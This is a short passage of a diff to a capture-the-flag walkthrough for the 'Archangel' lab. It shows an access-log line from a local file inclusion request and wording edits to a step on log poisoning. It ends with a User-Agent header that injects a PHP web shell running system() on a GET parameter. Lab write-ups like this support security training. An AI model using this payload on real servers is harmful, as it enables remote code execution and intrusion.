j-info/ctfsite/walkthroughs/2022-02-22 - Archangel.md

 10.6.127.197 - - [23/Feb/2022:21:27:33 +0530] "GET /test.php?view=/var/www/html/development_testing/mrrobot.php HTTP/1.1" 200 449 "http://mafialive.thm/test.php" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
 ```

-I check to see if I can use **log poisioning** to gain code execution and it works.
-To do this intercept a request in burp, change your user agent to the following:
+I then check to see if I can use **log poisioning** to gain code execution and it works.
+To do this intercept a request in burp and change your user agent to the following:

 ```
 User-Agent: Mozilla/5.0 <?php system($_GET['c']); ?> Firefox/91.0